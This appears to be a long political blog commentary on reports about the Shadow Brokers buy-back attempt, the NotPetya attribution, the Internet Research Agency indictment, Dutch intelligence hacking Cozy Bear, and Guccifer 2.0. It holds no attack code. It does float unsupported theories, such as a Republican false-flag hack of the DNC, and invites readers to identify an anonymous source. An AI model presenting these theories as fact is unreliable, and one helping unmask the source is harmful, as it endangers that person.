The Americans continued to press for the hacking tools. In December, the Russian said he was holding out on the hacking tools at the orders of senior Russian intelligence officials. So, early this year, the Americans issued an ultimatum: he had to start working for them and name everyone in his network or go back to Russia and never return to Europe. He took the latter option.
And this entire story, a story that could be interpreted as a Russian government admission of guilt over virtually ALL of the high-profile hacks targeting the US in recent years, appears to be largely backed up by the interviews this mysterious Russian FSB ‘fixer’ did with both The New York Times and The Intercept.
In fact, The Intercept was provided a document that describes an admission that the Russian provided to the Americans that, yes, there really has been an official Russian government effort to target US political activities starting in late 2014 or early 2015. The Russian told the Americans that he had no knowledge of a “master plan” to cause major disruption to U.S. election activities, but the effort was generally understood as a “green light” from Russian security officials to enlist cyber-related groups in probing and harassing activities directed at U.S. targets. That implies this entire alleged Russian government operation to sell ‘kompromat’ on Trump to the CIA apparently included telling the US agents that, yes, the Russian government really is behind this entire ‘Russian hacker’ campaign.
So, to summarize:
1. The CIA set out to retrieve the stolen hacking tools in December of 2016.
2. They came across a hacker, Carlo, who is either located in Germany or Austria. Carlo offered to return all the hacking tools and expose his network in exchange for immunity. Carlo had previously worked with US intelligence agents. Carlo demonstrated an ability to predict the Shadow Brokers’ public releases.
3. When the US refused to offer immunity and offered cash instead, a Russian in Germany known to be an FSB ‘fixer’ took over the negotiations. This figure is a known money-launderer with a history of interactions with US and European intelligence agencies.
4. The Russian first asked for $10 million, then $1 million. And soon started offering all sorts of ‘kompromat’ on Trump.
5. A few weeks after negotiations began, an American businessman was shown a 15 second video purportedly of Trump with prostitutes in a Moscow hotel in 2013, although it can’t be verified that it’s Trump.
6. In August of 2017, the Russian handed over a thumb drive containing a sample of the hacking tools. It was all publicly released content.
7. Negotiations stalled, then continued, and in September a $100,000 initial cash drop took place. The documents provided were all ‘kompromat’, with no hacking tools. The material included names of specific individuals and corporate entities allegedly tied to Russian interference in the 2016 U.S. election.
8. When pressed about the hacking tools, the Russian claimed senior Russian intelligence officials stopped him from releasing the hacking tools.
9. The Americans eventually banished the Russian from Europe after giving him a ‘work for us or go away’ offer.
10. This Russian was willing to be interviewed by the New York Times and The Intercept and even provided four example documents of the ‘kompromat’ he was trying to pass along to the Americans. It was all publicly available information that contained unusual syntax for Russian intelligence documents according to a former KGB officer.
11. This Russian reportedly told the Americans that the Russian government really did ‘green light’ this high-profile ‘I’m a Russian hacker!’ hacking campaign against US elections starting in late 2014 or early 2015 according to a document provided to The Intercept.
12. At least four Russians with espionage and underworld connections have appeared in Central and Eastern Europe, offering to sell kompromat to American political operatives, private investigators and spies that would corroborate the Steele dossier. Cody Shearer, a Democratic Party operative, has been trying to obtain such material from a different Russian.
So, if we are to accept all this, then the Russian government just had one of its ‘fixers’ basically admit that the Russian government was behind the Shadow Brokers hack and subsequent release of the hacking tools which posed a massive threat to computer security around the globe. And the Russian government wants this ‘fixer’ to openly peddle ‘kompromat’ on Donald Trump, but it’s either unverifiable material or publicly available. And this FSB ‘fixer’ was willing to talk to two newspapers about all this:
“The cash, delivered in a suitcase to a Berlin hotel room in September, was intended as the first installment of a $1 million payout, according to American officials, the Russian and communications reviewed by The New York Times. The theft of the secret hacking tools had been devastating to the N.S.A., and the agency was struggling to get a full inventory of what was missing.”
Yep, this whole story isn’t just based on interviews with American intelligence officials. The mysterious Russian was also willing to be interviewed. And as we can see, it’s not like he’s providing an alternative spin to the version of events. He appears to more or less corroborate everything.
So who is this mysterious Russian? Well, we’re told that he is suspected of having murky ties to Russian intelligence and to Eastern European cybercriminals:
We’re also told that he’s a known ‘fixer’ for the FSB who had previously dealt with US intelligence. Along with the German hacker Carlo:
And he also has a history of money-laundering, prompting the former chief of Russia operations at the C.I.A. to make the point that there isn’t a clear distinction between organized criminals and Russian intelligence assets (which is, of course, the case for intelligence assets all over the world):
“There were other questions about the Russian’s reliability. He had a history of money laundering and a thin legitimate cover business — a nearly bankrupt company that sold portable grills for streetside sausage salesmen, according to British incorporation papers.”
That sure is a lot of potentially identifying information about this guy. Anyone know a Russian with a nearly bankrupt company that sold portable grills for streetside sausage salesmen, according to British incorporation papers? Because that just might be our mystery Russian.
And this mystery Russian was tracked by US officials for months traveling back and forth between Berlin, Vienna, and St. Petersburg:
So that’s our mystery Russian who was happy to talk with the New York Times and the Intercept on the condition of anonymity.
And then there’s Carlo the hacker. Carlo was apparently willing to turn over people in his network along with all the hacking tools in exchange for immunity:
So, if we assume that the Shadow Brokers are indeed a Russian government operation, they apparently first were using Carlo, a German hacker, as a front. But when the CIA turned down Carlo’s demands for immunity, the Russians decided to drop the mask and have the mystery Russian directly negotiate a sales price. Again, doesn’t this seem incredibly odd?
So after the mystery Russian takes over the negotiations, he starts offering all sorts of ‘kompromat’, including a video of Trump with prostitutes which was shown to the American businessman intermediary at the Russian embassy in Berlin:
But the Americans weren’t interested in this kompromat, ostensibly over fears that this could exacerbate tensions between the White House and intelligence community. In addition, the rest of the kompromat appeared to be publicly available information and didn’t match traditional FSB grammar or language:
So the negotiations keep happening primarily over the hacking tools. And a $1 million price is arrived at. But when the example hacking tools are delivered, it’s all publicly available code:
Keep in mind, as we’ll see in The Intercept piece below, Carlo correctly gave advance notice of Shadow Broker releases. And yet, when it came to this mystery Russian, he only provided hacking code samples that were available to everyone in the world.
But the negotiations continue, they come to an agreement in September, a $100,000 down payment is made, but the content delivered is all just the kompromat. And when pressed on this, the Russian claims that senior Russian intelligence officials prevented the return of the hacking tools:
“In December, the Russian said he told the American intermediary that he was providing the Trump material and holding out on the hacking tools at the orders of senior Russian intelligence officials.”
Note the phrasing here because it sure sounds like it’s the mystery Russian who is recounting this to the reporter. And he’s recounting what amounts to an admission that the Russian government is indeed behind the Shadow Brokers...a hacking team that has done immense damage to people and organizations around the world by suddenly dumping those tools onto the internet.
And there are at least four Russians running around Europe trying to peddle kompromat on Trump:
So that’s what the New York Times reported on this, which is largely what’s in The Intercept’s report. But there are some additional details. Like how Carlo was located in Germany, not Vienna.
The piece also includes the critical information that Carlo correctly gave advance notice of the Shadow Broker releases. It also includes reporting on a document that summarizes some rather remarkable admissions by the mystery Russian that, yes, there really has been an official Russian government effort to target US political activities starting in late 2014 or early 2015:
“The Russian told the American that he had first become aware of Russian efforts targeting U.S. political activities in late 2014 or early 2015, according to the documents reviewed by The Intercept. The Russian stated that he had no knowledge of a “master plan” to cause major disruption to U.S. election activities, but the effort was generally understood as a “green light” from Russian security officials to enlist cyber-related groups in probing and harassing activities directed at U.S. targets.”
Yep, this alleged FSB ‘fixer’ with cyber criminal ties — who has dealt with US intelligence agencies before — apparently decided to tell this American intermediary that he was indeed aware of a Russian government “green light” starting in late 2014 or early 2015 to target the US by enlisting cyber-related groups. It’s quite an admission!
And the kompromat he was passing along wasn’t just on Trump. It also included specific individuals and corporate entities involved with this interference campaign:
And this whole strange story got started after US intelligence officials approached the American businessman in Germany and asked for his help. And it was this businessman who found the hacker in Germany who claimed to have the Shadow Broker content:
“The American was able to identify a hacker in Germany who claimed to have access to some of the stolen data believed to be held by the Shadow Brokers, and who accurately provided advance notice of several Shadow Broker data releases.”
And that, right there, is perhaps the only piece of information in this entire story that suggests that any of the shadowy figures involved with this story was actually involved with the Shadow Brokers.
And it doesn’t necessarily indicate this guy really was part of the Shadow Brokers. After all, if the Shadow Brokers really were interested in selling their treasure trove, arranging the sale over the Dark Web would be an obvious way to negotiate it and providing people advance notice of releases would be an obvious way to verify their credibility in these negotiations. So perhaps this mystery hacker was merely aware of some Dark Web sales pitches. For instance, imagine the Shadow Brokers were trying to find buyers on the Dark Web. Well, they might go to a Dark Web forum and say something like, “hey, we’re the Shadow Brokers. Want to buy our stuff?” And then they’d have to prove who they are...potentially by giving advance notice of releases. So if such sales pitches took place, any hacker on that forum would have the knowledge they need to pretend that they are the Shadow Brokers by relaying that same advance notice. Now, there’s no evidence that this is what happened, but it’s the kind of possibility we should consider.
So that’s the utterly bizarre story that just got released by The New York Times and The Intercept. A story that purports to reveal a Russian government psychological warfare operation designed to inflame partisan tensions in the US. And to inflame these tensions, the Russian strategy apparently involves basically admitting (via the interviews of the FSB ‘fixer’) that, yes, it’s running a psychological warfare operation against the US designed to inflame partisan tension. Which is a pretty odd strategy since one of the most effective ways to subdue those US partisan tensions is to have a Russian government operative basically come out and admit that it’s trying to inflame these tensions. And also admit to releasing the NSA hacking toolkit that caused all sorts of damage all over the world and could still potentially lead to much, much more damage. But that’s the story being peddled to the world right now.
Following up on the bizarre story about the CIA’s attempt to buy off the trove of NSA hacking tools possessed by the “Shadow Brokers”: The White House and UK government just issued near simultaneous statements formally blaming the Russian military for creating and releasing the “NotPetya” ransomware attack. They’re presumably blaming “Fancy Bear” for this since that’s the group attributed to the GRU. NotPetya is the attack that started in Ukraine and quickly spread around the world, causing billions in damage.
And while it was widely assumed that this attack originated in Russia given the fact that it started in Ukraine, there hadn’t before been any evidence linking the attack to the Russian military. And guess what, there still isn’t any actual evidence linking it to the Russian military. At least not any that’s been publicly released.
But that’s not the most hilarious part of this ‘formal charge’. The most hilarious part is that the White House statement charging the Russian military makes no mention of the fact that NotPetya was based on Shadow Broker code that had already been publicly released:
“The White House statement made no mention of an embarrassing related fact: The NotPetya attacks took advantage of vulnerabilities identified by the National Security Agency and then made public by a group calling itself the Shadow Brokers.”
Uh...yeah, that’s a pretty embarrassing related fact. So the NSA hacking tools get dumped to the world, someone uses some of those tools to create a virulent ransomware attack, and almost a year later the White House formally charges the Russian military for this without even acknowledging that this code was publicly available.
Now, of course, it’s possible that NotPetya was created and released by the Russian military, in which case the charges of recklessness would be extremely appropriate given the potential damage this kind of malware could potentially cause. Damage like locking the computer systems in hospitals. So if actual evidence emerges that the Russian military was behind this then the world really should be pretty damn pissed at the GRU. It’s just, you know, very possible that any other hacker or government in the world could have done exactly the same thing after the Shadow Brokers released that code.
But here we are, with the US formally making this attribution and threatening “international consequences” in response. Maybe those consequences will be more sanctions, or perhaps some sort of covert measures:
So it looks like any nation or group in the world that would like to exacerbate tensions between the US and Russia has a pretty straightforward way to do that: create malware using the Shadow Brokers tools and release it in Ukraine. It’s all the evidence that will be required.
It’s been an indictment-o-rama for the Mueller probe of late. And that now includes 13 employees from the Internet Research Agency, a.k.a. the ‘Kremlin troll farm’.
As we’ve already seen, the Internet Research Agency’s activities have previously received quite a bit of attention. Much of that attention has come in the form of narratives that depict a vast, sophisticated Kremlin-directed disinformation campaign that was designed to both help Donald Trump win the 2016 election while more generally trying to divide the US populace and stoke conflicts.
But as we’ve also seen, when you look at the details about the activity of the Internet Research Agency a much more haphazard picture emerges. There were indeed bizarre attempts to pay US activists to start provocative rallies. But those actions looked less like real attempts to cause trouble and more like ‘proof of concept’ actions. And while the online trolling did have a strongly pro-Trump and anti-Hillary angle, it also looked more like a click-bait operation designed to make money selling ads than any serious attempt to impact the US election.
So did this new indictment shed new light on the troll farm’s activities that clearly establish that it was indeed a Kremlin-directed disinformation campaign designed to get Donald Trump elected? Well, it did shed some new light. And there were some surprises. Surprises like sending operatives to the US to scope out potential opportunities and the theft of US identities to open bank accounts. And those surprises were pretty much the heart of the actual charges in the indictment: “The indictment charges all of the defendants with conspiracy to defraud the United States, three defendants with conspiracy to commit wire fraud and bank fraud, and five defendants with aggravated identity theft”:
““The indictment charges all of the defendants with conspiracy to defraud the United States, three defendants with conspiracy to commit wire fraud and bank fraud, and five defendants with aggravated identity theft,” a statement from the special counsel’s office said.”
A conspiracy to defraud the United States. That’s the general charge that appears to cover the ‘meddling in the US election’ campaign. And given the circumstances it’s not an unexpected charge.
Far more surprising were the charges issued against a subset of the defendants: Wire fraud, bank fraud, and aggravated identity theft. It’s surprising because when you look at the evidence of the impact this trolling campaign actually had on the 2016 election there’s no evidence that it had a meaningful impact at all. And yet the Internet Research Agency apparently sent operatives to the US while wire fraud, bank fraud, and identity theft was being carried out. That seems like a pretty big risk, at least for the operatives who traveled to the US:
But perhaps what’s most surprising is the budget of this operation, which apparently peaked at $1,250,000 per month as of September 2016:
And this elaborate, yet dubiously effective, psychological warfare operation was apparently started in 2014 according to the indictment:
And this operation kept going well after the 2016 election, as evidenced by the fact that the defendants apparently started destroying evidence in September 2017 after the FBI ‘busted their activity’:
So that’s an overview of the big indictment. An indictment that is widely characterized as providing ample proof of an elaborate, awe-inspiring massive psychological warfare operation ordered by Vladimir Putin.
And yet it’s hard to ignore the fact that it’s hard to imagine that this entire operation wouldn’t have been entirely ignored as just random noise if it wasn’t for the hacking of the DNC and subsequent release of those hacked documents. Because that’s how ineffectual this multi-year trolling operation appears to have been. Unless, of course, more evidence comes out later detailing a much broader and more impactful array of activities emanating from the troll farm. But at this point, even when you include all new details about this operation provided by the indictment, it’s not like those new details include new details pointing towards a previously unrecognized level of effectiveness of this trolling operation. The new details are on aspects like the identity theft and surprisingly large budget. A surprisingly large budget that’s still almost nothing compared to the +$2 billion spent overall during the campaign.
Additionally, as Adrian Chen, the American journalist who wrote one of the first big pieces on the Internet Research Agency in 2015, points out in the following piece responding to the indictments, the indictment doesn’t actually specify who ordered this professional trolling campaign. Was it someone higher in the Kremlin? Putin himself? Or, as some sources suggested to Chen back in 2015, was the entire troll farm operation undertaken independently from the Kremlin, but done with the purpose of currying favor with Putin?
“Yet the indictment does not shed light on the extent to which the Kremlin and, specifically, the Russian President, Vladimir Putin, were involved in the Agency’s work. Nor does the indictment move us any closer to a conclusion regarding whether anyone in the Trump campaign colluded with the Russian operation. The chain of command as detailed by the indictment stops at Prigozhin, who has long been identified as the chief architect of the Agency. The Times has identified Prigozhin as Putin’s “go-to oligarch” for “a variety of sensitive and often-unsavory missions, like recruiting contract soldiers to fight in Ukraine and Syria.” Yet Mueller’s new indictment does not claim that Putin personally ordered the Agency to turn into a pro-Trump propaganda machine. When I was reporting on the Agency, some sources suggested to me that it was a project undertaken independently, in order to curry favor with Putin.”
And that’s one of the most notable aspects of this indictment: what it didn’t include. Like evidence that it really was a Kremlin-directed operation and not something either independently conducted by an oligarch trying to curry favor with Putin or, perhaps, just a for-profit operation based on the recognition that trolling Americans online can be incredibly profitable.
But there were some other rather surprising details in the indictment that Josh Marshall noted in a TPM Prime piece (“Notes on Mueller’s New Indictments”) (behind a paywall, well worth the price of admission) that add important context to not just the story of the Internet Research Agency but the hacking campaign too.
For starters, as Marshall notes, the indictment hints at one or more cooperating witnesses who provided a large amount of details about the US government. The indictment contains references to internal company emails. And while some of the Internet Research Agency operatives are named, some aren’t named. That points towards some of these individuals cooperating with US investigators. So it’s very possible the Mueller probe knows a lot more than is being let on at this point.
Also, as Marshall notes, it appears that the Internet Research Agency operatives were getting concerned about their operations being discovered back in 2014 and 2015 and started deleting email accounts back then. Here’s the particular passage in the indictment he points to (page 24 of the indictment):
So US investigators appear to have the kind of information that indicates that these Internet Research Agency employees were taking steps to cover their tracks going back to 2014. Which, as Marshall points out in the piece, is rather eyebrow-raising because the first piece of journalism that exposed the Internet Research Agency was published by Adrian Chen in 2015. What was it that caused these individuals to delete email accounts over concerns that they were ‘discovered’ back in 2014? It’s a pretty significant mystery tucked away in that indictment. But when you consider that the indictment appears to indicate that US investigators have much more undisclosed information on the operations of the Internet Research Agency it will be interesting to see if information on what exactly spooked the troll farm back in 2014 and 2015 is eventually revealed.
And that brings us to one of the more remarkable stories about this entire #TrumpRussia saga. It’s a story that adds a significant context to both this new indictment of the Internet Research Agency that goes back to 2014 and also adds significant context to the prior reports on the ‘Cozy Bear’ of 2015. It was a story published last month in a Dutch publication about a remarkable series of hacks and cyber-battles between Dutch government hackers and....*drum roll*...Cozy Bear! Yep, Dutch government hackers in the AIVD intelligence agency reportedly hacked Cozy Bear’s hacking headquarters in 2014.
Not only that, but they apparently hacked a security camera for the hallway of the building that watched who entered and exited the room where the hackers worked and actually watched the hackers come and go from work. And it all started around mid-2014. The Dutch informed the NSA, and they jointly fought against the Russian hackers. And those battles reportedly include the initial 2015 hack of the DNC’s server. The Dutch hackers literally watched the hack in real-time and the NSA was made aware of this early on. Again, it’s a pretty remarkable story.
So at the same time this Internet Research Agency trolling team was allegedly getting up and running on its US operations in 2014 and 2015 and deleting email accounts over worries of getting caught, there was apparently a very active hacking war taking place between the ‘Cozy Bear’ attacker and NSA defenders on numerous US government systems. And Dutch hackers were watching and assisting the NSA the whole time. Literally watching the hackers over security cameras in some cases. That’s what was reported last month in a Dutch newspaper based on the accounts of six anonymous US and Dutch individuals familiar with the story.
But before we take a look at that article, first recall the earlier reporting about Robert Johnston who led the CrowdStrike investigation into the DNC server hack. Back in the summer of 2015, Johnston was a captain in the Marine Corps leading the newly formed Cyber Protection Team 81 for the US military. And according to Johnston, the ‘Cozy Bear’ hack was done around May of 2015 and that it was part of a much larger, and very ‘noisy’, hacking campaign that targeted 50,000–60,000 people. Johnston characterized this as a major change in tactics for Russian government hackers. According to Robert Johnston, it was as if the hackers didn’t care who was watching them. Also recall that when the ‘Fancy Bear’ hack was first reported on in July of 2016, US intelligence officials reportedly suspected that it was intentionally done to leave ‘Russian hacker’ fingerprints all over the hack to show that Moscow is a “cyberpower” that Washington should respect. That’s what was reported at the time. These are important pieces of context for both the story of the Internet Research Agency trolling campaign and the Dutch hacker intrigue.
Also note that it was indeed reported in March of 2015 that the State Department did indeed experience its worst hack ever in the Fall of 2014. And that hack, and a 24 hour battle between ‘Cozy Bear’ and the NSA to expel them from the State Department’s servers, is at the center of the following report about the Dutch hackers.
So, with all that in mind, behold the remarkable story of the Dutch hackers hacking ‘Cozy Bear’ and watching the initial DNC hack in real-time:
“It’s the summer of 2014. A hacker from the Dutch intelligence agency AIVD has penetrated the computer network of a university building next to the Red Square in Moscow, oblivious to the implications. One year later, from the AIVD headquarters in Zoetermeer, he and his colleagues witness Russian hackers launching an attack on the Democratic Party in the United States. The AIVD hackers had not infiltrated just any building; they were in the computer network of the infamous Russian hacker group Cozy Bear. And unbeknownst to the Russians, they could see everything.”
And there we have it: in the summer of 2014 Dutch hackers working for the AIVD apparently hacked into a university building next to the Red Square and in doing so just happened to stumble upon the headquarters of ‘Cozy Bear’. And this hack wasn’t discovered by the Russians for at least a year, allowing the hackers to watch these Russian hackers launch an attack at the Democratic Party. It’s worth recalling at this point that Robert Johnston, the Marine-turned-CrowdStrike cyber expert, said he suspected that the 2015 hack of the Democratic Party was actually just one part of that much larger “noisy” wave of phishing attacks that targeted 50–60 thousand people in the summer of 2015.
So it’s unclear what exactly the above report is implying when they suggest that the Dutch hackers watched the attack on the Democratic Party happen. But according to this report, these Dutch hackers warned the US that this was happening, providing “evidence of the Russian involvement in the hacking of the Democratic Party”, according to the six anonymous sources:
And these same sources assert that the evidence provided by the Dutch is the basis for the ‘high confidence’ that American intelligence agencies have that the Kremlin was indeed behind the hack:
And part of that ‘high confidence’ comes from actually hacking the security camera of the hallway in this building that led to the room where the hackers worked, allowing the Dutch hackers to literally watch the ‘Cozy Bear’ hackers come and go:
So using this inside knowledge, the AIVD watched the ‘Cozy Bear’ hackers do their work. But when it came to the hack of the US State Department in November of 2014, they didn’t just watch. They also informed the NSA of the hack and directly coordinated with the NSA to help repel the hackers over a 24 hour period that’s described as a rare cyber battle:
And not only do the Dutch hackers manage to hack the ‘Cozy Bear’ security cameras and watch the hackers in real-time, but they also used those images to deduce which Russian intelligence service the hackers worked for: the SVR, Russia’s external intelligence agency. It’s an interesting twist because, up until now, ‘Cozy Bear’ has always been referred to as the hacking team for the FSB, Russia’s internal intelligence agency. But according to the Dutch, who allegedly hacked the hackers, ‘Cozy Bear’ is working for the SVR. And this has apparently been known for years. It’s an interesting discrepancy in the reporting around ‘Cozy Bear’:
And at the end of this report we learn that the Dutch intelligence agencies were pretty pissed about this being reported at all. We also learn that the hack of ‘Cozy Bear’ lasted from 1 to 2.5 years. So the hack ended some time around the summer of 2015 (around the time of the DNC server hack) or maybe as late as the Fall of 2016. We don’t get to know. But the Dutch intelligence officers would have preferred none of this was ever known:
So that was the remarkable Dutch report on the even more remarkable alleged hacking of ‘Cozy Bear’. A hack so deep that there’s apparently security camera footage of the actual hackers. And a hack that not only allowed the Dutch to provide the NSA real-time information during a cyberbattle over the US State Department in November of 2014 but also allowed the Dutch team to watch the Russian hackers launch the attack against the Democratic Party in the summer of 2015. That’s the story.
And it’s a story that raises a number of rather significant questions about the ‘Russian hacks’ and the evidence US investigators are working with: First off, if the NSA was informed of the hacks against the Democratic Party in May of 2015 when it happened, why did the FBI wait until September of 2015 to inform the DNC that they were hacked and then do little to nothing about ensuring the DNC take that warning seriously until March of 2016? It’s not a new question, but in the context of the reports about the Dutch hackers and the Internet Research Agency troll campaign both going back to 2014 it’s a much bigger question.
And then there’s the question about that report from June of last year of the evidence the US had that the Kremlin was indeed behind the hacks. And remember how that evidence came down to a mole in the Kremlin along with “critical technical evidence” from another country? And remember how the report indicated that, “because of the source of the material, the NSA was reluctant to view it with high confidence”? Well, was that country providing the evidence that the NSA viewed with reluctance the Netherlands?
“Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.”
And that’s all we learned about that “most critical technical intelligence” at the time. It was critical, and the NSA was reluctant to view it with high confidence. And there’s never been an indication of which country it was that provided this intelligence. So was it the Netherlands? If so, that’s quite a surprise given the story about the NSA working closely and enthusiastically with the Dutch hackers. Also recall that the second hack of the DNC Server was allegedly carried out by a different Russian hacking team, ‘Fancy Bear’, and that hack didn’t take place until March of 2016. So it’s very possible the Dutch hackers would have had no information about that hack even if they really did hack into the ‘Cozy Bear’ team. But given that we still have no idea which country provided that “critical technical intelligence” it’s a question we need to ask.
So, all in all, if you accept at face value these twin stories of the troll farm activities and an aggressive hacking campaign both starting back in 2014, it might be easy to conclude that this is substantial circumstantial evidence that the 2016 ‘Fancy Bear’ hack of the DNC that actually led to the release of those hacked documents really was just an extension of some sort of Kremlin-directed hacking campaign.
But that conclusion leaves out some rather important details. And one of those details is highlighted by these twin stories: that there was extensive awareness within the US government of an apparent Russian hacking/trolling campaign starting in 2014 and 2015. And that awareness would have included knowledge that the DNC had already been hacked in 2015. So if you were looking for reasons why the GOP or its right-wing allies, for instance, might decide to try and hack the DNC in 2016 themselves and leave all sorts of ‘fingerprints’ making it look like ‘the Russians’ did it, you could hardly come up with a better backdrop than the situation that had emerged in 2014 and 2015.
Don’t forget that Newt Gingrich, Judicial Watch, and Barbara Ledeen — wife of Michael Ledeen who coauthored a book with Michael Flynn — put together a team in 2015 to seek out Russian hackers with Hillary’s emails. In other words, the idea of ‘Russian hackers’ hacking the Democrats was already well on the GOP’s mind in 2015.
Also don’t forget that the May 2015 hack of the German Bundestag which was formally blamed on the Kremlin in January of 2016 had technical details about the hack published in 2015, and those same technical details inexplicably showed up in the malware found from the second 2016 ‘Fancy Bear’ hack.
So how much awareness was there in 2015 within the US political establishment, and specifically the GOP, that there was an aggressive hacking campaign attributed to ‘Cozy Bear’ and an aggressive (if ineffectual) trolling campaign being carried out by the Internet Research Agency? We know the NSA knew about the ‘Cozy Bear’ hacking campaign. And the FBI clearly found out at some point in 2015. So who else in the US government knew about this? Did GOPers in Congress know? Because if the information revealed in this Mueller indictment and the story of the Dutch hackers was something more widely, if quietly, known within the US political establishment, then it would also have been widely, if quietly, known that hacking the Democrats and making it look like ‘the Russians’ did it was very much an option. Again, don’t forget that, as atypically ‘noisy’ as the ‘Cozy Bear’ hacks of 2015 were for a Russian government hacking campaign, that’s nothing compared to how atypically ‘noisy’ the ‘Fancy Bear’ hack of 2016 was. Was that ‘noisiness’ of the 2016 ‘Fancy Bear’ hack really the Kremlin deciding to prominently inject itself into the US 2016 election, thus ensuring a subsequent hysteria about ‘Russian meddling’ and a massive elevation of tensions? Or was it a crime of opportunity carried out by a political opponent of the Democrats made to look like ‘the Russians’ by taking advantage of the knowledge that there were already US government concerns over Russian trolls and hackers?
As the Mueller indictment indicated, those Russian trolls didn’t appear to want to get caught. And we’re told they were under Kremlin direction. So why did the hackers we’re told were under Kremlin direction so desperately want to get caught? It’s a central question raised by this entire #TrumpRussia saga that has yet to be meaningfully answered.
Cybersecurity researcher John Bambenek just revealed something rather noteworthy about Guccifer 2.0: Bambenek apparently had a two month long back and forth with Guccifer 2.0 from mid August 2016 to mid-October. And he got a number of Democratic party documents sent to him by Guccifer 2.0 during this period.
Here’s the really interesting part: all he had to do was reach out to Guccifer 2.0 using Twitter’s “Direct Messages” (DMs). He pointed out that he’s a Republican — he’s a former Illinois state senate candidate and currently serves on the state’s board of higher education as well as its community college board — and asked Guccifer 2.0 for documents that would make a big impact. That was apparently all that was required for him to actually receive some documents.
Keep in mind that this isn’t the first time we’ve heard reports about people simply reaching out to Guccifer 2.0 and getting a response. Or even documents. Recall how the operation by GOP operative Peter Smith that set out to find Hillary Clinton’s hacked emails on the dark web ended up reaching out to “Guccifer 2.0”, who told Smith’s team that they should contact neo-Nazi hacker Andrew “weev” Auernheimer. And then there was the Florida GOP operative Aaron Nevins, who got 2.5 GB of Democratic Party documents from Guccifer 2.0 simply by asking for them. And, of course, there were Roger Stone’s messages to Guccifer 2.0 over Twitter DM too.
So it’s not a new revelation to learn that random GOPers could simply reach out to Guccifer 2.0 and end up with documents. But this is one more example of that, so it raises the obvious question: Just how many other GOPers simply asked Guccifer 2.0 for documents and received them? Was this an open secret?:
“For a two month period in late 2016 — not long after the infamous Guccifer 2.0 online persona first appeared online and began leaking data to the media and via Twitter from stolen documents from the Russian hacks of the Democratic National Committee (DNC) and Democratic Congressional Campaign Committee (DCCC) — Bambenek reached out to Guccifer 2.0 via a Twitter direct message (DM), using his real name and actual party affiliation as an Illinois Republican.”
A message to Guccifer 2.0 over Twitter was all it took. So anyone in the world could have done what Bambenek did. Especially since it appears that Guccifer 2.0 didn’t even bother to look into who Bambenek was and discover that he was a cybersecurity researcher with Fidelis Cybersecurity:
It’s worth noting that Fidelis Cybersecurity was one of the firms that quickly backed up Crowd Strike’s early conclusion that the DNC hack was a Russian operation back in June of 2016. So while it’s possible Guccifer 2.0 didn’t see all the clear signs that Bambenek was a Fidelis employee, it’s also possible Guccifer 2.0 saw this early on and saw it as an opportunity to further the ‘Russian hacker’ narrative by directly interacting with someone from the cybersecurity industry.
Although based on Bambenek’s recounting of their interactions, if Guccifer 2.0 was intentionally pushing a narrative through Bambenek, that narrative appears to be that they were someone who lacked any meaningful political sophistication or knowledge of which documents might prove politically impactful. And that’s why it’s entirely unclear what it was about Bambenek’s interactions with Guccifer 2.0 that led him to his conclusion that Guccifer 2.0 was a Russian government operative:
So what did Bambenek do with the documents he received? Apparently he handed them over to the FBI:
“Bambenek in turn handed each message and document he obtained to the FBI.”
So it seems like the FBI had to be aware of Guccifer 2.0 trying to hand documents directly to Republican operatives at some point between mid-August and mid-October of 2016. That seems like a significant revelation just in terms of who knew what when.
And you have to wonder what this was all about when Bambenek says, “One of the things we were doing as researchers was giving him real-time feedback on his tradecraft mistakes ... then he stopped making metadata mistakes” in his document dumps:
So was Bambenek referring to the cybersecurity community’s early discovery of things like Cyrillic text in the meta-data, which was discovered a day after the initial June 15th, 2016, document dump? Or was Bambenek referring to some other form of real-time feedback? It’s unclear.
So, all in all, the Russian government decided to hand off the crucial public relations work of a high-stakes foreign interference operation to a “low-level operative not closely supervised by the Russian government.” That’s according to John Bambenek from Fidelis Cybersecurity, one of the first firms to ‘confirm’ Crowd Strike’s initial attribution.
And Bambenek bases this conclusion, in part, on his direct interactions with Guccifer 2.0. Direct interactions that ANY random person could have potentially had with Guccifer 2.0. And, again, that raises the question: how many other GOPers were in contact with Guccifer 2.0 over this period? Because it’s not like there was a lot stopping them.
Here’s an article about how the Obama administration ordered the various people in the US government who were developing counter-measures against the ‘Russian hackers’ to stand down in favor of a different approach. And the article contains some interesting new data points worth keeping in mind regarding the bizarre timeline of the US government’s response to the DNC hacks.
First, recall how the US reportedly detected the (initial) hacking of the DNC servers in May of 2015. It was surprisingly ‘noisy’ according to US cybersecurity officials, meaning it didn’t seem like the hackers were trying to hide what they were doing at all. And recall how the FBI didn’t inform the DNC of this initial hack until September of 2015, but the outreach to the DNC was so unusual (just a phone call to a DNC IT person) that the DNC didn’t think it was a real tip and didn’t know it was actually hacked until March of 2016 when the FBI agents physically showed up at the DNC.
So there’s a remarkable period, from around May of 2015 to March of 2016, where the US government knew about these hacks, but the DNC effectively didn’t. Well, according to the following article, there’s another set of people who were informed about the hacks in late 2015. It’s not a surprising set of officials to be informed about the hacks, but still noteworthy given the number of Democrats or people with ties to the Democratic party that would have known about this: State Department officials, including Victoria Nuland, were informed about the DNC hacks in December of 2015 and tasked with developing a US response:
“The view that the Obama administration failed to adequately piece together intelligence about the Russian campaign and develop a forceful response has clearly gained traction with the intelligence committee. Sen. Mark Warner, D‑Va., the ranking Democrat on the panel, said in an opening statement that “we were caught flat-footed at the outset and our collective response was inadequate to meet Russia’s escalation.””
A forceful cyber-response against Russia by the US in 2016 was necessary: That appears to be the consensus at the Senate intelligence committee.
And Victoria Nuland, the assistant secretary of state for Europe during the Obama administration (and someone who appeared to play an active role promoting the Maidan protests in Ukraine in 2014), not only agrees with that assessment but was helping to formulate a US response back in 2016. According to Nuland, she was briefed on the ‘Russian hacking’ as early as December 2015, long before senior DNC officials were even aware of it (due to the FBI’s inexplicably poor job of informing the DNC):
But Nuland wasn’t just informed about the hacks. She and other State Department officials were also authorized by then Secretary of State John Kerry to develop proposals to deter the Russian hackers:
And some of those proposed cyber-responses included actions like denial of service attacks on Russian news sites (presumably RT). For some reason this was deemed to be a form of deterrence, even though it wouldn’t actually be a deterrence unless the US made it clear it was behind the attack and would have probably become a propaganda bonanza for the Kremlin:
But those response plans were ultimately put on hold. This was in part over concerns that it could provoke a full scale cyber war but also due to the GOP congressional leadership refusing to sign on for a bipartisan US government response:
